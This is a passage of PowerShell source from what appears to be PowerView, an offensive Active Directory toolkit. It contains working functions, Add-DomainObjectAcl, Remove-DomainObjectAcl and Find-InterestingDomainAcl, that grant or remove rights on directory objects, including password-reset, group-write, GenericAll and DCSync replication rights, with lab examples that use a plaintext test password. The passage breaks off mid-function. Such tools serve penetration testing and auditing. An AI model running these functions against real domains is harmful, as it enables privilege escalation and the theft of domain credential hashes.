can be set with -RightsGUID. These rights are granted on the target +object for the specified -PrincipalIdentity. + +.PARAMETER TargetIdentity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain object to modify ACLs for. Required. Wildcards accepted. + +.PARAMETER TargetDomain + +Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain. + +.PARAMETER TargetLDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory object targets. + +.PARAMETER TargetSearchBase + +The LDAP source to search through for targets, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER PrincipalIdentity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain principal to add for the ACL. Required. Wildcards accepted. + +.PARAMETER PrincipalDomain + +Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Rights + +Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'. +Defaults to 'All'. + +.PARAMETER RightsGUID + +Manual GUID representing the right to add to the target. + +.EXAMPLE + +$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid +Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid} + +... + +Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=harmj0y))) +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainObject] Get-DomainObject filter string:(&(|(samAccountName=dfm.a))) +VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local +VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local + +Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid } + +AceQualifier : AccessAllowed +ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local +ActiveDirectoryRights : ExtendedRight +ObjectAceType : User-Force-Change-Password +ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114 +InheritanceFlags : None +BinaryLength : 56 +AceType : AccessAllowedObject +ObjectAceFlags : ObjectAceTypePresent +IsCallback : False +PropagationFlags : None +SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108 +AccessMask : 256 +AuditFlags : None +IsInherited : False +AceFlags : None +InheritedObjectAceType : All +OpaqueLength : 0 + +.EXAMPLE + +$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid +Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid} + +[no results returned] + +$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose +VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain +VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y)))) +VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain +VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser)))) +VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local +VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local + +Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid } + +AceQualifier : AccessAllowed +ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local +ActiveDirectoryRights : ExtendedRight +ObjectAceType : User-Force-Change-Password +ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114 +InheritanceFlags : None +BinaryLength : 56 +AceType : AccessAllowedObject +ObjectAceFlags : ObjectAceTypePresent +IsCallback : False +PropagationFlags : None +SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108 +AccessMask : 256 +AuditFlags : None +IsInherited : False +AceFlags : None +InheritedObjectAceType : All +OpaqueLength : 0 + +.LINK + +https://adsecurity.org/?p=1906 +https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String[]] + $TargetIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $TargetDomain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $TargetLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $TargetSearchBase, + + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [String[]] + $PrincipalIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $PrincipalDomain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateSet('All', 'ResetPassword', 'WriteMembers', 'DCSync')] + [String] + $Rights = 'All', + + [Guid] + $RightsGUID + ) + + BEGIN { + $TargetSearcherArguments = @{ + 'Properties' = 'distinguishedname' + 'Raw' = $True + } + if ($PSBoundParameters['TargetDomain']) { $TargetSearcherArguments['Domain'] = $TargetDomain } + if ($PSBoundParameters['TargetLDAPFilter']) { $TargetSearcherArguments['LDAPFilter'] = $TargetLDAPFilter } + if ($PSBoundParameters['TargetSearchBase']) { $TargetSearcherArguments['SearchBase'] = $TargetSearchBase } + if ($PSBoundParameters['Server']) { $TargetSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $TargetSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $TargetSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $TargetSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $TargetSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $TargetSearcherArguments['Credential'] = $Credential } + + $PrincipalSearcherArguments = @{ + 'Identity' = $PrincipalIdentity + 'Properties' = 'distinguishedname,objectsid' + } + if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain } + if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential } + $Principals = Get-DomainObject @PrincipalSearcherArguments + if (-not $Principals) { + throw "Unable to resolve principal: $PrincipalIdentity" + } + } + + PROCESS { + $TargetSearcherArguments['Identity'] = $TargetIdentity + $Targets = Get-DomainObject @TargetSearcherArguments + + ForEach ($TargetObject in $Targets) { + + $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] 'None' + $ControlType = [System.Security.AccessControl.AccessControlType] 'Allow' + $ACEs = @() + + if ($RightsGUID) { + $GUIDs = @($RightsGUID) + } + else { + $GUIDs = Switch ($Rights) { + # ResetPassword doesn't need to know the user's current password + 'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' } + # allows for the modification of group membership + 'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' } + # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 + # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 + # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c + # when applied to a domain's ACL, allows for the use of DCSync + 'DCSync' { '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', '89e95b76-444d-4c62-991a-0facbeda640c'} + } + } + + ForEach ($PrincipalObject in $Principals) { + Write-Verbose "[Add-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) '$Rights' on $($TargetObject.Properties.distinguishedname)" + + try { + $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$PrincipalObject.objectsid) + + if ($GUIDs) { + ForEach ($GUID in $GUIDs) { + $NewGUID = New-Object Guid $GUID + $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight' + $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $NewGUID, $InheritanceType + } + } + else { + # deault to GenericAll rights + $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'GenericAll' + $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $InheritanceType + } + + # add all the new ACEs to the specified object directory entry + ForEach ($ACE in $ACEs) { + Write-Verbose "[Add-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) rights GUID '$($ACE.ObjectType)' on $($TargetObject.Properties.distinguishedname)" + $TargetEntry = $TargetObject.GetDirectoryEntry() + $TargetEntry.PsBase.Options.SecurityMasks = 'Dacl' + $TargetEntry.PsBase.ObjectSecurity.AddAccessRule($ACE) + $TargetEntry.PsBase.CommitChanges() + } + } + catch { + Write-Verbose "[Add-DomainObjectAcl] Error granting principal $($PrincipalObject.distinguishedname) '$Rights' on $($TargetObject.Properties.distinguishedname) : $_" + } + } + } + } +} + + +function Remove-DomainObjectAcl { +<# +.SYNOPSIS + +Removes an ACL from a specific active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +This function modifies the ACL/ACE entries for a given Active Directory +target object specified by -TargetIdentity. Available -Rights are +'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended +rights GUID can be set with -RightsGUID. These rights are removed from the target +object for the specified -PrincipalIdentity. + +.PARAMETER TargetIdentity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain object to modify ACLs for. Required. Wildcards accepted. + +.PARAMETER TargetDomain + +Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain. + +.PARAMETER TargetLDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory object targets. + +.PARAMETER TargetSearchBase + +The LDAP source to search through for targets, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER PrincipalIdentity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain principal to add for the ACL. Required. Wildcards accepted. + +.PARAMETER PrincipalDomain + +Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Rights + +Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'. +Defaults to 'All'. + +.PARAMETER RightsGUID + +Manual GUID representing the right to add to the target. + +.EXAMPLE + +$UserSID = Get-DomainUser user | Select-Object -ExpandProperty objectsid +Get-DomainObjectACL user2 -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $UserSID} + +[no results returned] + +Add-DomainObjectAcl -TargetIdentity user2 -PrincipalIdentity user -Rights ResetPassword + +Get-DomainObjectACL user2 -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $UserSID } + +AceQualifier : AccessAllowed +ObjectDN : CN=user2,CN=Users,DC=testlab,DC=local +ActiveDirectoryRights : ExtendedRight +ObjectAceType : User-Force-Change-Password +ObjectSID : S-1-5-21-883232822-274137685-4173207997-2105 +InheritanceFlags : None +BinaryLength : 56 +AceType : AccessAllowedObject +ObjectAceFlags : ObjectAceTypePresent +IsCallback : False +PropagationFlags : None +SecurityIdentifier : S-1-5-21-883232822-274137685-4173207997-2104 +AccessMask : 256 +AuditFlags : None +IsInherited : False +AceFlags : None +InheritedObjectAceType : All +OpaqueLength : 0 + + +Remove-DomainObjectAcl -TargetIdentity user2 -PrincipalIdentity user -Rights ResetPassword + +Get-DomainObjectACL user2 -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $UserSID} + +[no results returned] + +.LINK + +https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String[]] + $TargetIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $TargetDomain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $TargetLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $TargetSearchBase, + + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [String[]] + $PrincipalIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $PrincipalDomain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateSet('All', 'ResetPassword', 'WriteMembers', 'DCSync')] + [String] + $Rights = 'All', + + [Guid] + $RightsGUID + ) + + BEGIN { + $TargetSearcherArguments = @{ + 'Properties' = 'distinguishedname' + 'Raw' = $True + } + if ($PSBoundParameters['TargetDomain']) { $TargetSearcherArguments['Domain'] = $TargetDomain } + if ($PSBoundParameters['TargetLDAPFilter']) { $TargetSearcherArguments['LDAPFilter'] = $TargetLDAPFilter } + if ($PSBoundParameters['TargetSearchBase']) { $TargetSearcherArguments['SearchBase'] = $TargetSearchBase } + if ($PSBoundParameters['Server']) { $TargetSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $TargetSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $TargetSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $TargetSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $TargetSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $TargetSearcherArguments['Credential'] = $Credential } + + $PrincipalSearcherArguments = @{ + 'Identity' = $PrincipalIdentity + 'Properties' = 'distinguishedname,objectsid' + } + if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain } + if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential } + $Principals = Get-DomainObject @PrincipalSearcherArguments + if (-not $Principals) { + throw "Unable to resolve principal: $PrincipalIdentity" + } + } + + PROCESS { + $TargetSearcherArguments['Identity'] = $TargetIdentity + $Targets = Get-DomainObject @TargetSearcherArguments + + ForEach ($TargetObject in $Targets) { + + $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] 'None' + $ControlType = [System.Security.AccessControl.AccessControlType] 'Allow' + $ACEs = @() + + if ($RightsGUID) { + $GUIDs = @($RightsGUID) + } + else { + $GUIDs = Switch ($Rights) { + # ResetPassword doesn't need to know the user's current password + 'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' } + # allows for the modification of group membership + 'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' } + # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 + # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 + # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c + # when applied to a domain's ACL, allows for the use of DCSync + 'DCSync' { '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', '89e95b76-444d-4c62-991a-0facbeda640c'} + } + } + + ForEach ($PrincipalObject in $Principals) { + Write-Verbose "[Remove-DomainObjectAcl] Removing principal $($PrincipalObject.distinguishedname) '$Rights' from $($TargetObject.Properties.distinguishedname)" + + try { + $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$PrincipalObject.objectsid) + + if ($GUIDs) { + ForEach ($GUID in $GUIDs) { + $NewGUID = New-Object Guid $GUID + $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight' + $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $NewGUID, $InheritanceType + } + } + else { + # deault to GenericAll rights + $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'GenericAll' + $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $InheritanceType + } + + # remove all the specified ACEs from the specified object directory entry + ForEach ($ACE in $ACEs) { + Write-Verbose "[Remove-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) rights GUID '$($ACE.ObjectType)' on $($TargetObject.Properties.distinguishedname)" + $TargetEntry = $TargetObject.GetDirectoryEntry() + $TargetEntry.PsBase.Options.SecurityMasks = 'Dacl' + $TargetEntry.PsBase.ObjectSecurity.RemoveAccessRule($ACE) + $TargetEntry.PsBase.CommitChanges() + } + } + catch { + Write-Verbose "[Remove-DomainObjectAcl] Error removing principal $($PrincipalObject.distinguishedname) '$Rights' from $($TargetObject.Properties.distinguishedname) : $_" + } + } + } + } +} + + +function Find-InterestingDomainAcl { +<# +.SYNOPSIS + +Finds object ACLs in the current (or specified) domain with modification +rights set to non-built in objects. + +Thanks Sean Metcalf (@pyrotek3) for the idea and guidance. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName + +.DESCRIPTION + +This function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl, +and for each returned ACE entry it checks if principal security identifier +is *-1000 (meaning the account is not built in), and also checks if the rights for +the ACE mean the object can be modified by the principal. If these conditions are met, +then the security identifier SID is translated, the domain object is retrieved, and +additional IdentityReference* information is appended to the output object. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER ResolveGUIDs + +Switch. Resolve GUIDs to their display names. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Find-InterestingDomainAcl + +Finds interesting object ACLS in the current domain. + +.EXAMPLE + +Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs + +Finds interesting object ACLS in the ev.testlab.local domain and +resolves rights GUIDs to display names. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs + +.OUTPUTS + +PowerView.ACL + +Custom PSObject with ACL entries. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ACL')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DomainName', 'Name')] + [String] + $Domain, + + [Switch] + $ResolveGUIDs, + + [String] + [ValidateSet('All', 'ResetPassword', 'WriteMembers')] + $RightsFilter, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $ACLArguments = @{} + if ($PSBoundParameters['ResolveGUIDs']) { $ACLArguments['ResolveGUIDs'] = $ResolveGUIDs } + if ($PSBoundParameters['RightsFilter']) { $ACLArguments['RightsFilter'] = $RightsFilter } + if ($PSBoundParameters['LDAPFilter']) { $ACLArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $ACLArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $ACLArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ACLArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ACLArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ACLArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ACLArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ACLArguments['Credential'] = $Credential } + + $ObjectSearcherArguments = @{ + 'Properties' = 'samaccountname,objectclass' + 'Raw' = $True + } + if ($PSBoundParameters['Server']) { $ObjectSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ObjectSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ObjectSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ObjectSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ObjectSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ObjectSearcherArguments['Credential'] = $Credential } + + $ADNameArguments = @{} + if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential } + + # ongoing list of built-up SIDs + $ResolvedSIDs = @{} + } + + PROCESS { + if ($PSBoundParameters['Domain']) { + $ACLArguments['Domain'] = $Domain + $ADNameArguments['Domain'] = $Domain + } + + Get-DomainObjectAcl @ACLArguments | ForEach-Object { + + if ( ($_.ActiveDirectoryRights -match 'GenericAll|Write|Create|Delete') -or (($_.ActiveDirectoryRights -match 'ExtendedRight') -and ($_.AceQualifier -match 'Allow'))) { + # only process SIDs > 1000 + if ($_.SecurityIdentifier.Value -match '^S-1-5-.*-[1-9]\d{3,}$') { + if ($ResolvedSIDs[$_.SecurityIdentifier.Value]) { + $IdentityReferenceName, $IdentityReferenceDomain, $IdentityReferenceDN, $IdentityReferenceClass = $ResolvedSIDs[$_.SecurityIdentifier.Value] + + $InterestingACL = New-Object PSObject + $InterestingACL | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN + $InterestingACL | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier + $InterestingACL | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights + if ($_.ObjectAceType) { + $InterestingACL | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType + } + else { + $InterestingACL | Add-Member NoteProperty 'ObjectAceType' 'None' + } + $InterestingACL | Add-Member NoteProperty 'AceFlags' $_.AceFlags + $InterestingACL | Add-Member NoteProperty 'AceType' $_.AceType + $InterestingACL | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags + $InterestingACL | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceName' $IdentityReferenceName + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDomain' $IdentityReferenceDomain + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDN' $IdentityReferenceDN + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceClass' $IdentityReferenceClass + $InterestingACL + } + else { + $IdentityReferenceDN = Convert-ADName -Identity $_.SecurityIdentifier.Value -OutputType DN @ADNameArguments + # "IdentityReferenceDN: $IdentityReferenceDN" + + if ($IdentityReferenceDN) { + $IdentityReferenceDomain = $IdentityReferenceDN.SubString($IdentityReferenceDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + # "IdentityReferenceDomain: $IdentityReferenceDomain" + $ObjectSearcherArguments['Domain'] = $IdentityReferenceDomain + $ObjectSearcherArguments['Identity'] = $IdentityReferenceDN + # "IdentityReferenceDN: $IdentityReferenceDN" + $Object = Get-DomainObject @ObjectSearcherArguments + + if ($Object) { + $IdentityReferenceName = $Object.Properties.samaccountname[0] + if ($Object.Properties.objectclass -match 'computer') { 